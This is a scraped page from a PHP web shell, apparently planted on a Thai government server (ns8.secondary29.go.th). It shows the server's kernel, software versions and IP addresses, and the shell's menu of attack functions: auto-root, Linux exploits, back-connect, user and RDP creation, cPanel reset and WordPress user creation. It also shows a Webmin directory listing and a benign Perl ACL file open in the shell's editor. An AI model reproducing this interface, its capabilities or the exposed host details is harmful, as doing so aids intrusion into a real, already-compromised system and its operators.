Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
system-status /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
366
B
-rw-r--r--
acl_security.pl
944
B
-rw-r--r--
config
37
B
-rw-r--r--
defaultacl
7
B
-rw-r--r--
enable-collection.pl
376
B
-rwxr-xr-x
module.info
137
B
-rw-r--r--
module.info.ca
102
B
-rw-r--r--
module.info.ca.UTF-8
116
B
-rw-r--r--
module.info.de
70
B
-rw-r--r--
module.info.de.UTF-8
82
B
-rw-r--r--
module.info.hu
24
B
-rw-r--r--
module.info.hu.UTF-8
31
B
-rw-r--r--
module.info.ms_MY
83
B
-rw-r--r--
module.info.ms_MY.UTF-8
95
B
-rw-r--r--
module.info.no
21
B
-rw-r--r--
module.info.no.UTF-8
27
B
-rw-r--r--
module.info.pl
83
B
-rw-r--r--
module.info.pl.UTF-8
95
B
-rw-r--r--
postinstall.pl
358
B
-rwxr-xr-x
recollect.cgi
180
B
-rwxr-xr-x
system-status-lib.pl
12.68
KB
-rwxr-xr-x
system_info.pl
8.58
KB
-rw-r--r--
systeminfo.pl
266
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : acl_security.pl
use strict; use warnings; do 'acl-lib.pl'; our (%text, %in); # acl_security_form(&options) # Output HTML for editing security options for the acl module sub acl_security_form { my ($o) = @_; print &ui_table_row($text{'acl_show'}, &ui_radio("show_def", $o->{'show'} eq '*' ? 1 : 0, [ [ 1, $text{'acl_showall'} ], [ 0, $text{'acl_showsel'} ] ])."<br>\n". &ui_select("show", [ split(/\s+/, $o->{'show'}) ], [ [ 'host', $text{'acl_host'} ], [ 'cpu', $text{'acl_cpu'} ], [ 'temp', $text{'acl_temp'} ], [ 'load', $text{'acl_load'} ], [ 'mem', $text{'acl_mem'} ], [ 'disk', $text{'acl_disk'} ], [ 'poss', $text{'acl_poss'} ] ], 7, 1)); } # acl_security_save(&options, &in) # Parse the form for security options for the acl module sub acl_security_save { my ($o, $in) = @_; if ($in->{'show_def'}) { $o->{'show'} = '*'; } else { $o->{'show'} = join(' ', split(/\0/, $in->{'show'})); } }
Close